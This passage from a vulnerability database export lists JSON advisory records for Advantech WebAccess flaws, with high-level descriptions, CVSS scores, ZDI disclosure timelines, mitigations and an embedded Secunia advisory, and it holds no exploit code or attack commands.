"ZDI-14-255", "ident": null }, { "date": "2014-07-18T00:00:00", "db": "ZDI", "id": "ZDI-14-241", "ident": null }, { "date": "2014-07-18T00:00:00", "db": "ZDI", "id": "ZDI-14-246", "ident": null }, { "date": "2014-07-18T00:00:00", "db": "ZDI", "id": "ZDI-14-243", "ident": null }, { "date": "2014-07-18T00:00:00", "db": "ZDI", "id": "ZDI-14-253", "ident": null }, { "date": "2014-07-18T00:00:00", "db": "ZDI", "id": "ZDI-14-242", "ident": null }, { "date": "2014-07-18T00:00:00", "db": "ZDI", "id": "ZDI-14-256", "ident": null }, { "date": "2014-07-18T00:00:00", "db": "ZDI", "id": "ZDI-14-254", "ident": null }, { "date": "2014-07-24T00:00:00", "db": "CNVD", "id": "CNVD-2014-04544", "ident": null }, { "date": "2015-08-11T00:00:00", "db": "VULHUB", "id": "VHN-70303", "ident": null }, { "date": "2014-09-25T00:03:00", "db": "BID", "id": "68714", "ident": null }, { "date": "2014-07-22T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-003487", "ident": null }, { "date": "2014-07-24T00:00:00", "db": "CNNVD", "id": "CNNVD-201407-476", "ident": null }, { "date": "2024-11-21T02:06:09.310000", "db": "NVD", "id": "CVE-2014-2364", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201407-476" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess Vulnerable to stack-based buffer overflow", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-003487" } ], "trust": 0.8 }, "type": { "_id": null, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "7d7f00b0-463f-11e9-b5c5-000c29342cb1" }, { "db": "IVD", "id": "e485769a-2351-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201407-476" } ], "trust": 1.0 } }
var-201708-1705
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within TpMegaJVT.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-527" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-527" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-527", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-527", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-527" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within TpMegaJVT.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-527" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4091", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-527", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-527" } ] }, "id": "VAR-201708-1705", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:50:56.703000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\BF28239A-3823-40FF-BC02-2DA4D9DBB1EEIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-527" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-527" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-527", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-527", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-527", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess TpMegaJVT Set_MD_Mode Heap-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-527" } ], "trust": 0.7 } }
var-201602-0470
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C7B IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to sprintf using the ProjectName and NodeName parameters. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201602-0470", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-143" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-16-143" } ], "trust": 0.7 }, "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "ZDI-16-143", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-16-143", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-143" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C7B IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to sprintf using the ProjectName and NodeName parameters. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "sources": [ { "db": "ZDI", "id": "ZDI-16-143" } ], "trust": 0.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-3151", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-143", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-143" } ] }, "id": "VAR-201602-0470", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:59:59.540000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI vulnerability disclosure policy on lack of vendor response.09/15/2015 - 09/17/2015 - ZDI disclosed reports to ICS-CERT (+1 more on 9/29/2015).09/15/2015 and 09/17/2015 - ICS-CERT acknowledged with a tracking number.10/06/2015 - ICS-CERT advised ZDI that the vendor was working on a patch tentatively planned for November.11/10/2015 - ICS-CERT advised ZDI that this patch/next version would be released in early December.12/14/2015 - ZDI asked ICS-CERT if a patch was available. 12/15/2015 - ICS-CERT advised ZDI that a patch release was expected \"any day now.\"12/15/2015 - ICS-CERT inquired with the vendor about the patch.01/06/2016 - ICS-CERT advised ZDI that the vendor released WebAccess 8.1.01/06/2016 - ZDI asked ICS-CERT what fixes are supposed to be in the build. 01/13/2016 - ICS-CERT provided ZDI with a written draft advisory.01/15/2016 - ICS-CERT published an advisory.01/15/2016 - ZDI asked ICS-CERT to confirm CVE mapping.01/22/2016 and 01/26/2016 - ZDI discussed with ICS-CERT by phone the concern that the patch seemed incomplete.01/27/2015 - ZDI concluded that this cases is not patched.02/01/2015 - ZDI notified ICS-CERT intent to release a 0-day advisory02/02/2015 - ZDI advisory released.-- Mitigation:Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting. These features are available in the native Windows Firewall, as described in and numerous other Microsoft Knowledge Base articles.", "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-143" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-143" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "ZDI", "id": "ZDI-16-143" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-143" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-143" } ] }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "(0Day) Advantech WebAccess webvrpcs Service BwWebSvc.dll ProjectName/NodeName sprintf Stack-Based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-16-143" } ], "trust": 0.7 } }
var-201907-1649
Vulnerability from variot
Advantech WebAccess / SCADA is a set of SCADA software based on browser architecture by Advantech. The software supports dynamic graphic display and real-time data control, and provides the ability to remotely control and manage automation equipment.
Advantech WebAccess / SCADA has a remote code execution vulnerability. The vulnerability stems from the failure to verify the legality of the data provided by the user. An attacker could use this vulnerability to execute arbitrary code with Administrator permissions on a remote host
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201907-1649", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 0.8, "vendor": "advantech", "version": "v8.4.0" } ], "sources": [ { "db": "IVD", "id": "7c77153f-d07d-4e76-817d-b2af337a98d6" }, { "db": "CNVD", "id": "CNVD-2019-21293" } ] }, "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CNVD-2019-21293", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "7c77153f-d07d-4e76-817d-b2af337a98d6", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.9 [IVD]" } ], "cvssV3": [], "severity": [ { "author": "CNVD", "id": "CNVD-2019-21293", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "7c77153f-d07d-4e76-817d-b2af337a98d6", "trust": 0.2, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "7c77153f-d07d-4e76-817d-b2af337a98d6" }, { "db": "CNVD", "id": "CNVD-2019-21293" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess / SCADA is a set of SCADA software based on browser architecture by Advantech. The software supports dynamic graphic display and real-time data control, and provides the ability to remotely control and manage automation equipment. \n\nAdvantech WebAccess / SCADA has a remote code execution vulnerability. The vulnerability stems from the failure to verify the legality of the data provided by the user. An attacker could use this vulnerability to execute arbitrary code with Administrator permissions on a remote host", "sources": [ { "db": "CNVD", "id": "CNVD-2019-21293" }, { "db": "IVD", "id": "7c77153f-d07d-4e76-817d-b2af337a98d6" } ], "trust": 0.72 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "CNVD", "id": "CNVD-2019-21293", "trust": 0.8 }, { "db": "IVD", "id": "7C77153F-D07D-4E76-817D-B2AF337A98D6", "trust": 0.2 } ], "sources": [ { "db": "IVD", "id": "7c77153f-d07d-4e76-817d-b2af337a98d6" }, { "db": "CNVD", "id": "CNVD-2019-21293" } ] }, "id": "VAR-201907-1649", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "7c77153f-d07d-4e76-817d-b2af337a98d6" }, { "db": "CNVD", "id": "CNVD-2019-21293" } ], "trust": 1.2173957400000002 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "7c77153f-d07d-4e76-817d-b2af337a98d6" }, { "db": "CNVD", "id": "CNVD-2019-21293" } ] }, "last_update_date": "2022-05-17T01:43:06.712000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess has remote code execution vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchinfo/show/164987" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2019-21293" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "7c77153f-d07d-4e76-817d-b2af337a98d6" }, { "db": "CNVD", "id": "CNVD-2019-21293" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-07-05T00:00:00", "db": "IVD", "id": "7c77153f-d07d-4e76-817d-b2af337a98d6" }, { "date": "2019-08-04T00:00:00", "db": "CNVD", "id": "CNVD-2019-21293" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-07-08T00:00:00", "db": "CNVD", "id": "CNVD-2019-21293" } ] }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess has remote code execution vulnerability", "sources": [ { "db": "CNVD", "id": "CNVD-2019-21293" } ], "trust": 0.6 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Code injection", "sources": [ { "db": "IVD", "id": "7c77153f-d07d-4e76-817d-b2af337a98d6" } ], "trust": 0.2 } }
var-201202-0036
Vulnerability from variot
Cross-site scripting (XSS) vulnerability in bwerrdn.asp in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess bwerrdn.asp lacks filtering on parameters leading to cross-site scripting attacks. Advantech WebAccess is prone to multiple remote vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach? Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM: http://secunia.com/products/corporate/vim/ovum_2011_request/
TITLE: Advantech OPC Server ADAM ActiveX Control Buffer Overflow Vulnerability
SECUNIA ADVISORY ID: SA46775
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46775/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
RELEASE DATE: 2011-11-07
DISCUSS ADVISORY: http://secunia.com/advisories/46775/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/46775/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A vulnerability has been reported in Advantech OPC Server, which can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to an error in the ADAM ActiveX control and can be exploited to cause a buffer overflow.
Successful exploitation may allow execution of arbitrary code.
The vulnerability is reported in the following components: * Advantech ADAM OPC Server versions prior to V3.01.012. * Advantech Modbus RTU OPC Server versions prior to V3.01.010. * Advantech Modbus TCP OPC Server versions prior to V3.01.010.
SOLUTION: Reportedly a patch has been released. Contact the vendor for further information.
PROVIDED AND/OR DISCOVERED BY: ICS-CERT credits Security Research and Service Institute Information and Communication Security Technology Center (ICST).
ORIGINAL ADVISORY: ICS-CERT: http://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201202-0036", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "6.0" }, { "model": "broadwin webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "broadwin", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "6.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "5.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "1ac69822-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0657" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001546" }, { "db": "CNNVD", "id": "CNNVD-201202-402" }, { "db": "NVD", "id": "CVE-2011-4522" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": 